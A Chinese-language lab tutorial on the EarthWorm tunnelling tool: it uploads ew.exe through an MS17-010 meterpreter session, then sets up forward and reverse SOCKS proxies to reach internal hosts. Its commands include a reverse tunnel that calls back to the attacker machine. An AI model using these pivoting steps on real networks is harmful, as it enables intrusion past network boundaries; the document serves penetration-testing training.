0.实际操作视频地址
https://www.bilibili.com/video/BV18Y4y1T7Vz/
1.earthworm(EW)简介
一款内网穿透工具,具有 SOCKS v5服务和端口转发两大功能,可在复杂网络环境下完成内网穿透
EW支持正向代理和方向代理
2.下载地址
https://github.com/rootkiter/EarthWorm/blob/master/server/download/ew.zip
3.靶场环境
kali 网卡1 桥接模式 地址192.168.1.5
跳板机win7-1 网卡1 桥接模式 地址 192.168.1.4 网卡2 仅主机模式 10.10.10.7
目标机win2012web 网卡1 仅主机模式10.10.10.13
目标机win2012weblogic 网卡1 仅主机模式10.10.10.12
4.正向socks代理,跳板机上执行,当跳板机不出网时可以使用正向socks代理
利用ms17010获取session,然后上传ew.exe到跳板机
meterpreter > upload /test/proxy/earthworm/ew.exe c:\\windows\\temp
执行ew.exe启动socks代理监听1080端口
meterpreter > execute -f "c:\\windows\\temp\\ew.exe -s ssocksd -l 1080"
4.1ps 查看进程和netstat 查看端口和完整的一次代理过程讲解
4.2.设置proxychains4代理工具,代理地址是跳板机的ip地址192.168.1.4
vi /etc/proxychains4.conf
[ProxyList]
socks5 192.168.1.4 1080
4.3渗透工具:
4.3.1rdesktop 通过proxychains4代理链接内网主机10.10.10.13
proxychains rdesktop 10.10.10.13
4.3.2火狐设置socks代理,代理地址是跳板机ip地址192.168.1.4
4.3.3burp设置
火狐设置http代理,走burp监听的端口8080
用proxychains启动burp
proxychains java -jar burp.jar
4.4.4其它渗透工具如果无代理设置,都可以用proxychains启动,渗透内网,比如nmap 等等。
5.反向代理,当跳板机可以出网时可以使用反向socks代理
5.1kali攻击机上后台执行命令监听8082和8088端口,socks代理监听在8082端口,把socks代理数据转发给8088端口,另外8088端口还用于接收反弹
# ./ew_for_linux -s rcsocks -l 8082 -e 8088 &
5.2win7跳板机上执行下面指令,反弹链接到攻击机kali的192.168.1.5的8088端口
ew.exe -s rssocks -d 192.168.1.5 -e 8088
5.3设置proxychains4代理工具
vi /etc/proxychains4.conf
[ProxyList]
socks5 192.168.1.5 8082
5.4渗透工具设置
5.4.1firefox设置socks代理-》setting-》Manual proxy configuration-》SOCKS Host-》设置kali的地址192.168.1.5-》port设置8082
火狐浏览器直接访问内网目标http://10.10.10.13:8080/bluecms/uploads/
5.4.2burp
burp设置监听8080端口,用proxychains启动,firefox设置走HTTP代理127.0.0.1 端口8080,burp正常抓包
#proxychains java -jar burpsuite.jar
5.4.3rdesktop
proxychains rdesktop 10.10.10.13